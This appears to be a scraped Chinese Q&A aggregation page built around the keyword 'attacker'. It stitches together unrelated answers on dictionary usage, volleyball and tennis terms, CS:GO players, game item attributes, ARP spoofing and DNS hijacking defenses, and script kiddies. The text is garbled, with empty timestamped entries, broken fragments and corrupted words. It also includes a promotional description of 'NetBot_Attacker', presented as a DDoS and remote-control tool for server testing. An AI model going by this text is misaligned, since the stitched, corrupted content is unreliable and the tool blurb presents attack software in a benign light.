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2023-06-07 09:04:55



attack名词是attacker。attack常见变形有过去式attacked、过去分词attacked、现在分词attacking、第三人称单数attacks、复数attacks、名词attacker。派生词是attack,v. 进攻;攻击;侵害;严厉批评;公开抨击;袭击;侵袭;狠抓;大力处理;发起进攻;attacker,n. 袭击者;前锋;锋线队员;cyberattack,n. 网络攻击。短语有heart attack心脏病、under attack遭到攻击、terrorist attack恐怖袭击;恐怖攻击;恐怖主义攻击、physical attack人身攻击、angle of attack攻角;迎角、panic attack突如其来的一阵惊恐。attack例句:1、Track down the organization responsible for the terrorist attack.追查对恐怖袭击负责的组织。2、Many women also do not experience chest pain before a heart attack the way men do.许多女性在心脏病发作前也不会像男性那样感到胸痛。3、A customer threaten to attack a supervisor with a knife.顾客威胁要用刀攻击主管。4、When a leafy plant is under attack, it doesn"t sit quietly.当多叶植物受到攻击时,它不会安静地呆着。
2023-06-07 01:05:241


2023-06-07 01:06:004


2023-06-07 01:06:082


setter 二传 攻击手 attacker后排队员 back field playthe libero player 自 由 人
2023-06-07 01:06:193


csgo白菜是AttackeR。tyloo战队csgo成员AttackeR绰号白菜,在队伍里枪法也是十分突出的,经常能够取得首杀为队伍打开局面,有时也能超常发挥打出惊人的操作。TYLOO电子竞技俱乐部是由East One.Nice和ft合并组成的电子竞技俱乐部,成立于2007年5月25日。2018年9月10日上午,天禄战队成功闯入Major正赛,创造了亚洲《CS:GO》项目的历史。2007年5月25号,由East One.Nice和ft合并组成TYLOO电子竞技俱乐部正式成立。2016年10月,TYLOO再次夺得亚洲Minor冠军,与亚军澳洲牛仔Renegades一同锁定了本届亚洲Minor的两个参赛名额。2018年TYLOO电子竞技俱乐部收购了DSG战队,获得了2018赛季LDL联赛参赛资格,随后在2018年LDL春季赛上战胜了SC战队夺得冠军。
2023-06-07 01:06:341


scorer spiker blocker server digger setter receiver libero 得分手 攻击手 拦网手 发球手 救殏手 举球手 接球手 自由人 攻击 : attack : 指各种扣球动作 扣球 : spike : 球网上的一般攻击谓之扣球 攻击球员 : attacker / spiker : 指从球网上将球扣入对区之球员 直线攻击 : straight spike : 攻击球员把球向边线正前方之直线位置扣出的攻击方式 斜线扣击 : cross spike : 攻击者把球向斜线方位扣出之情形 后排攻击 : back attack : 后排球员在攻击线后所施之攻击 直接扣球 : direct spike : 前排球元把对方之来球在网上直接扣入对区之情形 杀球 - kill spike 举球 - set 发球 - serve 接发球(下手传) - pass underhand 上手接球- overhand 救球 - dig 篮网 - block 飞扑 - dive 发球得分 - ace 发球抛球 - toss 跳发 - jump serve 后排攻击 - back row attack 吊球 - tip 快攻 - quick-set spike 上手发球也可以用 - overhand 就行 所以下手发球也可以用 - underhand 就行 高手击球(不一定是杀球) - overhand stroke 飘浮球 - floater 上旋球 - topspin 后旋球 - backspin 假动作 - feint 图片参考:.yimg/iugc/rte/ *** iley_1 2008-10-03 01:21:59 补充: 排球专用术语字典︰ 参考: 我经常听评球员讲波都会讲食叉烧,其实就系chance。 我知道系得咁多。
2023-06-07 01:06:471


2023-06-07 01:06:563

怎样理解as was the 18-year-old attacker

先翻译:两个小孩严重受伤,这个18岁的攻击者在人们要抓住他的时候遭到了警察的射击.还原句子:Two children were seriously wounded(by him), as was the 18-year-old attacker, who was shot by police when they tried to arrest him前面的被动语态中省略了by him, him他在后面的从句中做主语,我判定这是一个as引导的定语从句 as he was...
2023-06-07 01:07:153

NetBot_Attacker 软件效果如何?

NetBot_Attacker软件是由原安全警戒线核心成员(三名)开发完成,后由韩国公司合作完善既NetBot.DDOS.Team。作者保留所有版权。集DDOS压力负载测试系统、远程管理系统、自我保护、等。是您测试服务器安全和服务器管理的理想选择。主要功能特点:“DDOS攻击、远程控制、集群上线 、等
2023-06-07 01:07:221


WinArpAttacker的攻击也称ARP攻击,也有叫DDos攻击的。 ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。从而使目标主机不能正常与外部进行通信,甚至使整个网络瘫痪。 普通ARP防火墙可能有一定的效果,但很有限,不能根本上解决问题。比较有效的防御方法是: A. 绑定IP和MAC单纯依靠IP或MAC来建立信任关系是不安全,理想的安全关系建立在IP+MAC的基础上。因此,上网必须绑定IP和MAC。B. 静态ARP缓存表. 每台主机都有一个临时存放IP-MAC的对应表,ARP攻击就通过更改这个缓存来达到欺骗的目的,使用静态的ARP来绑定正确的MAC是一个有效的方法。C.ARP 高速缓存超时设置 在ARP高速缓存中的表项一般都要设置超时值,缩短这个超时值可以有效的防止ARP表的溢出。 D.定期查询 在某个正常的时刻,做一个IP和MAC对应的数据库,以后定期检查当前的IP和MAC对应关系是否正常。定期检测交换机的流量列表,查看丢包率。
2023-06-07 01:07:311


2023-06-07 01:07:4010


 ace 发球时,对局双方中一方发球,球落在有效区内,但对方的拍子及身体任何部位却没有触及到球而使之直接得分的发球。  advantage 占先,打到deuce后优势之一方,分发球占先及接球占先  advantage for receiver 接发球方占先  advantage for server 发球方占先  all 平(比分相同)  alley 单打与双打之间的场区  alley fighter 善于打硬仗和绝地反击的选手  alternate service 换发球  American twist 美式旋转球  approach shot 上网球  attacker 攻击型选手  attacking return 攻击性回球  asphalt courts 沥青球场  B  back-hand 反手击球  back-hand drop shot 反手放放球  back-hand half-volley 反手半截击  back-hand volley 反手截击  backspin 下旋球  ball boy 球童/拾球员  ball sense 网感,球感  ball control 控球技术  band 球网白边  baseline ball 底线球  blade of racket 拍面  blocked return 堵截回击球  bodyline ball 贴身球/追身球  break point 破发点  bye 比赛轮空  C  cement court 水泥球场  center bond 中心布带  center mark 中点  center service line 中线  chair-umpire 主裁判  change sides 交换  championship 锦标赛  champion 冠军  chip 切球  chop stroke 削球  classical guide 经典打法  clay court 红土场地/泥地  consistency 稳定性  continental 大陆式  correction 更正  court surfaces 场地表面  cover the court 防守  covered court 室内场地  cross shot 斜线球  cross-corner 对角球  crosscourt 斜线球  cut 削球  D  dark horse 黑马  deep ball 深球  default 弃权  defensive 防御性  deuce 局末平分, 盘末平局  disqualify 取消比赛资格  double bounces 球弹地两次  double break point 2个破发点  double fault 双误, 两次发球失误  double-handed backhand 双手反手击球  double hit 在一次挥拍中球碰撞球拍两次  double elimination tournament 双打淘汰赛  doubles side line 双打边线  doubles 双打  doubles court 双打场地  down-the-line shot 边线直线球/落底线球  depth shot 打深度球  driven return 抽击回击球  drop shot 吊小球/短球  E  eastern 东方式  eastern forehand 东方式正手  EPO(erythropoietin) 增强体能的违禁药物  etnaer service line 中线  event begins 赛事开始  exhibition 表演赛  F  fault 失误  fifteen 十五  fifteen all 一平  finish 比赛结束  first service 第一发球  fitness 状态  flat(cannon ball) 平击球(炮弹式)  flat drive 平抽球  flat stroke 平击球/平发球  fluke, set-up, easy 机会球  follow-through 跟进动作  foot fault 脚部犯规/脚误  footwork 步法  fore court 前场  forehand 正手  forehand half-volley 正手半截击球  forehand volley 正手截击球  forward spin 上旋  forty 四十  forty all 三平  foul 发球出界、无效球  foul shot 技术犯规  G  game 局(1局为四分)  giant slayer 巨人杀手  good ball 好球  good return 有效回击  grab-punch position 截击位置  grandslam 指Wimbledon/U.S. Open/French Open/Australian Open四大赛事  grass court 草地网球场  grip 握拍姿势/握拍法  ground ball 落地球  ground stoke 击触地球,即球落地弹起后再击球,是最基本的打法(抽球)  gut, string (球拍的)弦  H  half-volley 半截击球/反弹球  hand signal 手势  handle of racket拍柄  hard court 硬地场地  heavy ball 重球  hinder 妨碍/干扰  hindrance 妨碍  hitting the ball 击球  high ball, lob 高球  form 状态  hot shot 热门人物  I  in 界内有效球  in-form 球感极佳   interference 干扰  interruption 中断比赛  J  jump smash 跃起抽球  just out 刚好出界  K  kill 杀球,使对方无力防守之球  knee 膝  knock-out 淘汰赛  L  lawn tennis 草地网球运动  lead 领先  left service court 左发球区  let 重发球/重赛  lift drive 提拉抽球  lift 拉弧圈球  line ball 触线球  linesman 司线员  lob 吊高球/挑高球  long ball/shot 长球  love 0分(出自法语)  love game 一方得零分的一局  low ball 低球  low drive 抽低球  low volley 低截球  M  macadam 碎石  make the draw 抽签  match 记分  match point 赛末点  mental skills 心理状态  mixed 混双  N  net 落网球/发球触网,分net in(有效)及net out(无效)两种  net-cord judge 球网裁判员  net-post 网柱  net rusher 上网型选手  no-man"s-land 真空地带  not up 两跳,球在地上弹跳两次  O  obscurity 冷门  offensive 进攻性  order of receiving 接发球次序  order of service 发球次序  out 界外无效球  out court 场外地区  out-of-form 球感不好  over-grips 护柄带  over the net 球过网  overhead 高球  overhand service 上手发球  overhead smash, overhand smash 高球扣杀  outside in 高难度场外救球  overrules 改判  P  partner 伙伴  passing shot 穿越球  percentage play 沉着应战  permanent fixtures 场上的固定物  placement 球落点  place-up 抛球  play 比赛开始  player 参赛者  point penalty 罚分  point score 比分  point-up 指着球  pole 网柱  postpone 延期比赛  progressive playing 改善打发  R  racket press 球拍夹  racket 球拍  racquet 球拍  ranking 排名  ready 准备比赛  ready position 预备位置  receive 接发球  receiver 接球员  receiving formation 接发球的位置  referee 裁判  return回击球  right service court 右发球区  rules 规则  round 轮  round robin tournament 循环赛  S  score 得分  second service 第二发球  seed buster 种子克星  seeding player 非种子球员  seeded player 种子球员  sensation 热门人物  serve 发球  server 发球员  service 发球  service area 发球区  service court 发球区  service line 发球线  service return 回发球  set 盘(6局为一盘)  set point 盘末点/盘点  short shot 短球  shots 球路  side line 边线  sideline ball 边线球  sidespin 侧旋转球  single court 单打场区  single elimination tournament 单淘汰赛  single net post 单打支柱  single side line 单打边线  sitter 极容易的“菜”球  slice 侧旋球  slice service 削发球  smash 抽球/抽球  scoring in tie-break 决胜局计分  spin 旋转球  split-stepping 分开两脚站立  stamina 耐力  stance 站姿  statistics 技术统计  straight ball 直线球  strap 中央带,球网中带  stretching exercises 伸展运动  strings 球拍线  suspension 暂停比赛  surface of ball 球面  surprise return 突然的回击  suspension 暂停  swing 挥拍  T  tactics 战术  take-back 拉拍  tennis 网球运动/网球  tennis lines 网球场上的线  tennis togs 网球衣  thirty 三十  thirty all 二平  through the net 穿网球  throwing position 准备击球姿势  tie-break 决胜局/抢七局,正赛未分胜负后的加赛  tie-breaker 平局决胜制  time 时间到  timing 击球时间的掌握  top spin 上旋球  toss 抛球  turn 转身  triple break point 3个破发点  twist 强烈旋转球  U  umpire 裁判  underhand service 下手发球  underspin 下旋球  unsighted 没看见  up-and-comer 处于上升期的新人  upset artist 爆冷专家  V  volley 截击空中球  W  warm-up 热身运动/准备活动  western 西方式  wide 打出边线的球  wide ball 离身球  wind up 收拍  winner 胜利者/致胜球  wood 木板  wooden court 木板场地  wrap-around 包卷打法  wrist 腕望采纳~
2023-06-07 01:08:041

There were more than one _____(attack),"the detective said

2023-06-07 01:08:121


2023-06-07 01:08:181

CSGO天禄tyloo战队成员有哪些 天禄tyloo战队阵容介绍

CSGO天禄TYLOO战队目前的阵容为,AttackeR,Summer,bntet,slowly,danking,如今tyloo成员发生了许多变动,somebody退役之后,大哥bntet在辗转几回之后也回到了天禄。 Summer Summer,也就是cy1, 这名97年出生的选手在14年就加入了tyloo,是tyloo的老选手之一,随队征战过很多次世界级比赛,表现很稳定。 AttackeR 绰号白菜,但白菜一点也不菜,在队伍里枪法也是十分突出的,经常能够取得首杀为队伍打开局面,有时也能超常发挥打出惊人的操作。 slowly 小胖曾经是Ehome战队的成员,在Ehome有着很好的发挥,在来到了tyloo以后更是彻底发挥出了自己的潜能,曾在ESL One里约之路亚洲区带领tyloo击败中东强队CR。 danking 蛋总danking是tyloo的狙击手,一名很年轻的选手。当一名没有大赛经验的选手在加入一支在国内FPS具有一定影响力的战队肯定会带来一些争议和负面新闻,但是danking没有因此而怯懦,在随队征战国外强队时,出色的发挥给观众留下了深刻的影响,就连茄子、ququ等csgo大主播也毫不吝啬赞美之词,对这位年轻的天才狙击手很是青睐。danking对tyloo战队也很是看好,希望自己能够一直在tyloo待到退役。 BnTeT 于 2017 年 4 月至 2020 年 1 月为 天禄 效力,平均评分为 1.20。 2020年,BnTeT选择去北美发展。加入 Gen.G 赢得了 DreamHack Open Anaheim 2020 和 ESL One Road to Rio North America Championships,但随着时尚时代的到来,Gen. G选择解散CSGO部门。 2021年,BnTeT参加了由原Renegade核心阵容组成的EXTREMUM,但团队在一年内并没有取得显著成绩。由于jkaem选择离开,最终阵容也崩溃了。 天禄希望通过签约在2022年取得突破。他们在去年前往欧洲进行了一段时间的训练和比赛。虽然已经离开世界舞台很久了,但天禄选手们依然展现了他们的实力和进步的速度。不知道BnTeT会取代谁,但“老大哥”的回归肯定会增加团队的整体火力。
2023-06-07 01:08:361


脚本小子  脚本小子,英文script kiddie 或 script boy  script kiddie指的是用别人写的程序的人。网上有很多hacker写的小程序,许多  hacker 在公布他们发现的漏洞时,常常也附上一个可以exploit漏洞的程序,作为自己发现  这个漏洞的证明。也有的hacker 编写了一些hacking的工具程序。而脚本小子就是收集这些  程序的人,他们可能自己从来没有写过一行程序,可能对这些程序内部如何工作一无所知,  也不知道如何写这些程序,更不知道如何发现系统的漏洞,就是说他们不知道如何“hack”  一个操作系统或一个应用程序,但是他们知道如何使用hacker编写的程序与工具,脚本小子  可以利用一些已知的工具, exploit一些以知的操作系统或应用程序漏洞。在很多hacker的  观点中,他们不是hacker,所以hacker们给他们起了个名字叫 script kiddie。很多hacker  在公布自己发现的漏洞时,常在公布的程序上坐一些手脚,如果你看不懂程序,只会编译或  者只会照学照用的话,得到的东西很可能不能正常工作。这样做的目的就是为了防止脚本小  子用他们的程序到处去胡乱试,造成损害。   所以脚本小子是攻击者,是attacker, attacker和hacker应该是不同的, hacker发现系统的  漏洞,但他们不一定攻击某个系统。Attacker的目的是为了要攻击某个系统,获得控制权。
2023-06-07 01:08:451


绯染天空职业定位效果详解。不少玩家可能对于游戏中各个职业的定位还不太清楚,下面带来具体的介绍,供各位玩家们参考。职业定位效果详解作为一款回合式战斗游戏,每一位角色与敌人皆拥有两条代表生命值的能量条,分别为护甲(DP)与血量(HP)。每一回合开始时,所有角色皆会获得法力点(SP),用于施放技能以对敌人造成更大伤害,或是为敌我方带来各式各样的增益效果(buff、debuff)。须注意的是,战斗中若有任何一名我方角色血量归零,则会立即遭到判败。身为セラフ部队的一员,每一位角色在战斗中皆有其担当的定位,唯有了解每一种职业的定位与大致战斗流程,使之适得其所,才不会陷入满手好牌却输到脱裤的窘境。现阶段的职业共有七种,分别如下:Attacker=主力输出,持有技能可对敌人的血量(HP)造成额外伤害Breaker=主力输出,持有技能可对敌人的护甲(DP)造成额外伤害Blaster=副输出,持有技能可一次性堆叠高额破坏率Buffer=增伤辅助,持有技能可大幅提升自身与队友的技能伤害Debuffer=增伤辅助兼副输出,持有技能可大幅提升自身与队友的技能伤害Defender=生存辅助,持有技能可增加自身与队友的防御,或是降低敌人所造成的伤害Healer=生存辅助,持有技能可恢_自身和队友的护甲值,但无法恢_血量同时,战斗大致上可划分为三个阶段:一、累积后续作战所需的法力点(SP),在敌人施放大招的行动前一口气击破敌人的护甲(DP)二、堆叠敌人的破坏率(可视为永续存在,受益对象为我方全员的增伤型buff)以提升后续输出,同时保持队员的生存叁、动用所有增益效果(buff、debuff),一口气斩杀敌人的剩余血量(HP)若按照战斗阶段与各职业主要发挥场合进行划分,则会得到以下结果:第一阶段主场Style:Breaker、Buffer、Debuffer第二阶段主场Style:Blaster、Defender、Healer第叁阶段主场Style:Attacker、Buffer、Debuffer在战斗当中,Buffer所提供的Buff往往拥有幅度最大的增伤效果,且绝大多数buff皆可重复堆叠(至2次),持续回合为永久,只有在使用伤害型技能时才会进行消耗。相较之下,Debuffer所提供的debuff虽然也能重复堆叠(至2次),但增伤幅度次之,且有持续回合的限制(大多仅持续一回合,当回合结束后便消失),必须透过Overdrive(追加回合)机制才能重复堆叠,以藉此发挥最大效果。与上述两者相比,Blaster快速堆叠破坏率的增伤效益高低完全视目标个体而定,并只有在击破护甲(DP)后才能开始发挥效果。因此,Blaster有时候在战斗中重要性仅次于Buffer,有时候却可以被Debuffer完全取代。作为主要输出的两项职业,Attacker和Breaker在战斗当中往往是最不重要的存在,不仅是因为他们所造成的额外伤害限于护甲(DP)或血量(HP),效益部分亦无法重复堆叠,同时效果量也远远不如前叁者。唯有在阵容充实并追求极限输出的状况下,他们才有在场上发挥的空间。因此,这5种职业的重要度顺序为:BufferDebufferBlaster Breaker= Attacker取代性高低顺序则为:Buffer(无法取代)Debuffer(取代性低)Blaster(视战斗而定,取代性不等) Breaker(取代性高)= Attacker(取代性高)关于生存辅助,Defender与Healer的重要性完全视队伍与关卡之间的强度而定。在游戏前期,Defender与Healer可以明显降低关卡难度并提供新手更大的容错空间;但当玩家熟悉战斗机制,迈入中期后,对于他们的依赖自然会降低。对于老玩家而言,Defender与Healer只有在面对高难度关卡时,才会视情况派出场。
2023-06-07 01:08:521


2023-06-07 01:08:591

CCF 炉石传说(c++)答案里有一行不明白 问问大家

vector <status>v[2] 其实是申请了两个vector,分别是v[0]和v[1],你把vector<status>看成T,就是T v[2],这不就C语言的数组咯。v[0][1]其实只是vector的用法(0就是RED)。就比如说定义一个vector<int> vec;它是可以用下标来访问的:vec[0],vec[1]。。。vector<vector<status>>当然也可以,但不建议嵌套
2023-06-07 01:09:061


2023-06-07 01:09:155

英语文献翻译,求高手啊 !!!

2023-06-07 01:09:291


2023-06-07 01:09:361


forehand是正手 bachhand是反手
2023-06-07 01:09:445

什么是 DNS 劫持/重定向攻击

DNS劫持又叫做域名劫持,指攻击者利用其他攻击手段,篡改了某个域名的解析结果,使得指向该域名的IP变成了另一个IP,导致对相应网址的访问被劫持到另一个不可达的或者假冒的网址,从而实现非法窃取用户信息或者破坏正常网络服务的目的。DNS的作用是把网络地址对应到真实的计算机能够识别的网络地址,以便计算机能够进一步通信,传递网址和内容等。由于域名劫持往往只能在特定的被劫持的网络范围内进行,所以在此范围外的域名服务器能够返回正常的IP地址,高级用户可以在网络设置把DNS指向这些正常的域名服务器以实现对网址的正常访问。所以域名劫持通常相伴的措施——封锁正常的DNS的IP。如果知道该域名的真实IP地址,则可以直接用此IP代替域名后进行访问。要执行DNS劫持攻击,攻击者要么在用户的系统上安装恶意软件,要么通过利用已知漏洞或破解DNS通信来接管路由器。攻击涉及破坏用户的系统DNS设置,以将其重定向到Rogue DNS服务器,从而使默认DNS设置无效。要执行攻击,攻击者要么在用户的系统上安装恶意软件,要么通过利用已知漏洞或破解DNS通信来接管路由器。因此,用户将成为域欺骗或网络钓鱼的受害者。防止DNS劫持攻击的小技巧1、建议使用复杂的密码重置路由器的默认密码。2、使用DNS注册器时使用双因素身份验证,并修补路由器中存在的所有漏洞以避免危害。3、最好远离不受信任的网站,避免下载任何免费的东西。4、如果您已被感染,建议删除HOSTS文件的内容并重置Hosts File。5、为防止DNS劫持,始终建议使用良好的安全软件和防病毒程序,并确保定期更新软件。6、安全专家建议使用公共DNS服务器。7、最好定期检查您的DNS设置是否已修改,并确保您的DNS服务器是安全的。
2023-06-07 01:10:112


2023-06-07 01:10:182


2023-06-07 01:15:031


Cut with a knife或With a knife chop down a person
2023-06-07 01:15:122


2023-06-07 01:15:283

rpg maker xp伤害计算

2023-06-07 01:15:363

电脑网页出现hacked by attacker gaza怎么办

2023-06-07 01:15:443


这款游戏中只为我们提供了英文字幕,这就让许多玩家在理解游戏内容上造成了很大的困难,为了让大家可以更好的理解游戏内容,于是深空高玩这里就为大家大家提供了流浪Vagante各装备属性介绍中文翻译一览,若你也对此有疑问的话就一起了解下吧。所有装备属性中文翻译帽子Flame aura 火焰光环 随机对身边的敌人造成火焰伤害freezing aura冷冻光环 随机身边的敌人会被冰冻或者受到1点冰系伤害slow aura 减速光环,身边的敌人速度变慢boulder protection 落石陷阱对你无效underwater breathing 水下呼吸手套Improved Archery 弓箭专精,提高弓箭伤害heavy punches 徒手攻击加强,击退敌人wall phasing 穿墙手套 只能穿水平方向的墙 贴墙长按要穿的方向discretely increase reach of weapons加强武器攻击范围grab walls 可以吸住墙壁,会缓慢下落项链soul of a retaliatory familiar 召唤一只红色的妖精,在你受伤后,会主动碰撞敌人造成伤害soul of a compassionate familiar 召唤一只绿色的妖精,在你受伤后有机会恢复HPsoul of a demonic familiar 召唤一只蓝色的妖精,会对视野范围内的敌人发射魔法飞弹,固定1点伤害unbounded sight 视野不会被障碍物阻挡berserkitis 狂暴化,攻击时会变红,攻击和速度提高,但是无法使用法术和打开背包。然后会进入EX虚弱状态,攻击和速度下降。衣服damage reflection 反射伤害attacker will get pushed back 击退攻击者attacker will sometimes be burned 攻击者会被点燃attacker will sometimes be shocked受到攻击时有机会放电attacker will sometimes be poisoned攻击者会中毒coins sometimes seem to heal injuries 拾取金币时会回血death becomes easier to encounter HP变成1 伤害大幅提高Spike protection 不怕刺,落上去可以破坏掉。但是如果是会造成掉落伤害的高度掉到刺上面还是会秒杀。Timing jumps allows for unlimited mid-air jumps 无限跳跃Chance to turn into mist when hurt受伤后变成雾气,防止被连续攻击鞋子Charge up extra damage by walking 移动中蓄力 攻击可以造成额外伤害trailblazer 走过的地面会有火,对敌人造成伤害light feet 脚步更轻,不会引发落石陷阱,食人花,魔法陷阱bouncy 弹跳,按住跳跃键,落地时会自动跳跃high jump 跳的更高jumping on enemies deals damage 踩踏对敌人造成伤害Super Speed 超快速 移动速度加快很多Floor phasing 穿墙鞋子,只能穿下方的墙,长按下和跳武器fire wand火球法杖wand of pestilence 毒雾法杖,挥动会对正前方放出一片毒雾wand of chaos 随机效果法杖,挥动一次范围内的所有人都会受到2个随机效果或释放法术(8颗魔法飞弹或者闪电术),可以随机出所有药剂效果还有燃烧效果spirit emitter 攻击时有机会出现自动追踪的小魔法飞弹burneing 攻击时有机会让敌人燃烧lifesteal 攻击时有机会吸血,回复1HPshocking 攻击时有机会电击敌人freezing 攻击时有机会冰冻敌人fairy magic 妖精魔法,点亮敌人,防御下降+knockback 击退敌人弓箭weightless arrows 射出去的箭无重量,直线射出Glowing arrows 光亮箭arrow Trajecftory 瞄准线homing arrows 追踪箭戒指reflect projectiles 反射远程攻击,有CDgold collector 金币会自动飞向你luminous 光亮度提高Increased chance of finding magic items 有机会找到魔法物品
2023-06-07 01:15:501


2023-06-07 01:16:456


2023-06-07 01:17:012

求问,extra attack的属性和什么有关

,不过没用quot。;Walk 提升跑步速度%Non Class skill 无职业限制技能state 特殊状态.;很诱惑的属性  Indestructible 装备无法破坏前面是灵气。在后半段了。中英文对照表UdieToo中文属性对照表Strenh 增加力量Energy 增加精力Dexterity 增加敏捷Vitality 增加体力Stat Points 没用Skill Points 没用Life 没用Max Life 增加最大生命Mana 没用Max Mana 增加最大魔法stamina 没用Max Stamina 增加最大耐力 level 没用experience 没用gold 没用goldbank 没用Enhanced Defense % 防御增加百分比Enchanced Damage % 伤害增加百分比Enchanced Min Dmg % 增加最小伤害百分比Attack Rating 增加命中率Chance of Blocking % 增加格挡率Min 1-handed Dmg 增加单手最小伤害Max 1-handed Dmg 增加单手最大伤害Min 2-handed Dmg 增加双手最小伤害Max 2-handed Dmg 增加双手最大伤害Damage % nv 伤害增加百分比Regenerate Mana % nv 法力再生(隐藏)Regenerate Mana Plus % 法力再生Heal Stemina Plus % 耐力恢复lastexp 没用nextexp 没用Defense 增加防御Def vs Missile 增加对近战的防御Def vs Melee 增加对远程攻击的防御Damage Reduced By 伤害减少Magic Dmg Reduced By 魔法伤害减少Damage Reduced By % 伤害减少百分比Magic Resistance % 魔法抵抗百分比Max Magic Resistance % 增加最大魔法抵抗的百分比Fire Resistance % 增加火抗的百分比Max Fire Resistance % 增加最大火抗的百分比Lightning Resistance % 增加电抗的百分比Max Lightning Resistance % 增加最大电抗的百分比Cold Resistance % 增加冰抗的百分比Max Cold Resistance % 增加最大冰抗的百分比Poison Resistance % 增加毒抗的百分比Max Poison Resistance % 增加最大毒抗的百分比damageaura 没用Fire Damage 增加火焰伤害Max Fire Damage 增加火焰伤害最大值Lightning Damage 增加闪电伤害Max Lightning Dmg 增加闪电伤害最大值Magic Damage 增加魔法伤害Max Magic Damage 增加魔法伤害最大值Cold Damage 增加寒冷伤害Max Cold Damage 增加寒冷伤害最大值Cold Lenh 冻结目标的时间Poison Damage 增加毒伤害Max Poison Dmg 增加毒伤害最大值Poison Lenh 目标中毒的持续时间Life Stolen Per Hit Min 偷取生命Life Stolen Per Hit Max 没用Mana Stolen Per Hit Min 偷取法力Mana Stolen Per Hit Max 没用Stamina Drain Min 没用Stamina Drain Max 没用Stun Lenh没用 Run#47.Unused213 …Defense (on Lvl) 按等级增加防御Enhanced Defense (on Lvl) 按等级提高防御Life (on Lvl) 按等级提高生命值Mana (on Lvl) 按等级提高魔法值Maximum Damage (on Lvl) 按等级提高最大伤害Enhanced MaxDmg (on Lvl) 按等级提高最大伤害Strenh (on Lvl) 按等级增加力量Dexterity (on Lvl) 按等级增加敏捷Energy (on Lvl) 按等级增加精力Vitality (on Lvl) 按等级增加体力Att Rating (on Lvl) 按等级增加命中率Bonus to Att Rating % (on Lvl) 按等级提高额外的命中率Maximum Cold Dmg (on Lvl) 按等级增加最大寒冷伤害Maximum Fire Dmg (on Lvl) 按等级增加最大火伤害Maximum Lightning Dmg (on Lvl) 按等级增加最大闪电伤害Maximum Poison Dmg (on Lvl) 按等级增加最大毒伤害Cold Resistance % (on Lvl) 按等级增加百分比冰抗Fire Resistance % (on Lvl) 按等级增加百分比火抗Lightning Resistance % (on Lvl) 按等级增加百分比电抗Poison Resistance % (on Lvl) 按等级增加百分比毒抗Absorbs Cold Damage (on Lvl) 按等级提高吸收寒冷伤害能力Absorbs Fire Damage (on Lvl) 按等级吸收火伤害能力Absorbs Lightning Damage (on Lvl) 按等级吸收闪电伤害能力Absorbs Poison (per lvl) Walk Speed % nv 跑步速率增加百分比(隐藏)Attack Speed % nv 攻击速率增加百分比(隐藏)other_animrate 没用quantity 没用value 没用Durabilty 没用Max Durability 增加装备耐久Replenish Life 自行恢复生命值Max Durability % 没用Life % 增加生命上限%Mana % 增加法力上限%Attacker Takes Damage Of 反伤Extra Gold From Monsters % 怪掉的钱增加Chance Of Getting Magic Items % 这个就是魔法装备暴率Knock Back 击退Time Duration (未测试)Add Class Skill 加单人技能(职业代码为0到6的2进制)Unsentparam1 未知属性1Add experience 增加百分比得到的经验值Heal after kill 加X生命在杀死一只怪物后Reduced prices 降低商人价格%Double Herb Duration (未测试)Light Radius 增加光照范围Light Color nv 光照范围(隐藏)Requirements % 物品对基本属性的需求Level Require 没用Increased Attack Speed 提升攻击速度%Level Require % 增加等级需求Last block frame 格挡有关Faster Run#47,比如头上永远顶个经验祭坛Faster Hit Recovery Rate 加快打击恢复Monster player count 没用Poison override 没用Faster Block Rate 快速格挡速度Bypass undead 没用Bypass demons 没用Faster Cast Rate 快速释法速度Bypass beasts 没用Single Skill 增加职业限制技能Rest in peace 杀死怪物后恢复平静Curse resistance 抗诅咒几率Poison Lenh Reduced By % 自己的中毒时间减少Damage 增加伤害Hit Causes Monster To Flee % 使怪物怪物会逃跑Hit Blinds Target 打中的敌人会失明Damage To Mana % 受损生命转化为法力Ignore Target Defense 无视目标防御Target Defense % 减少目标防御%Prevent Monster Heal 防止怪物回血Half Freeze Duration 自己的冰冻时间减半Bonus To Attack Rating % 增加百分比额外的命中率Reduce Monster Defense per Hit 每次打中都减少怪物的防御Damage To Demons % 增加对恶魔系怪物的伤害Damage To Undead % 增加对不死系怪物的伤害Attack Rating Against Demons 增加对恶魔系怪物的命中率Attack Rating Against Undead 增加最不死系怪物的命中率Throwable (未测试)Elemental Skill 增加火焰技能All Skill Levels 增加所有技能Attacker Takes Lightning Dmg Of 攻击者受到电伤害ironmaiden_level 没用lifetap_level 没用thorns_percent 没用bonearmor 没用bonearmormax 没用Attack Freezes Target 冻结目标+Chance of Open Wounds 撕开伤口的几率Chance of Crushing Blow 压碎攻击的几率Kick Damage 增加脚踢伤害Mana After Each Kill 加法力在杀死一只怪物后Life After Each Demon Kill 加生命在杀死恶魔系怪物后Extra Blood 没用Chance of Deadly Strike 致命攻击的几率Fire Absorbs % 火焰吸收%Fire Absorbs 火焰吸收Lightning Absorbs % 闪电吸收%Lightning Absorbs 闪电吸收Magic Absorbs % 魔法吸收%Magic Absorbs 魔法吸收Cold Absorbs % 冰冷吸收%Cold Absorbs 冰冷吸收Slows Target By % 使目标减缓%Aura 灵气赐予Indestructible 装备无法破坏Cannot be Frozen 不会被冻结Slower Stamina Drain % 减缓耐力消耗 ReAnimate 杀死怪物后复活为Pierce Attack % 穿透攻击Fire Magic Arrows or Bolts 射出魔法箭Fire Explosive Arrows or Bolts 射出爆炸箭Min Throw Dmg nv 增加百分比最小远程攻击Max Throw Dmg nv 增加百分比最大远程攻击UnCoded 未知属性UnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedUnCodedAttack Vs Monster 对特定怪物增加命中率Damage Vs Monster 对特定怪物增加伤害fade 身体透明化Armor override % 没用Unused183 …Unused184 …Unused185 …Unused186 …Unused187 …Add Skill Tab 加入单系技能Unused189 没用Unused190 …Unused191 …Unused192 …Unused193 …Increased Sockets 增加凹槽(需先激活)Skill On Attack 攻击时释放特定魔法Skill On Kill 杀死怪物时释放特定魔法Skill On Death 自己死亡时放特定魔法Skill On Hit 打中时释放特定魔法Skill On Levelup 升级时释放特定魔法Unused200 没用Skill On Get Hit 被打中时释放特定魔法Unused202 没用Unused203 …Charged Skill 特定聚气技能Unused205 没用…Unused206 …Unused207 …Unused208 …Unused209 …Unused210 .Unused211 …Unused212 .。。注意看一下。
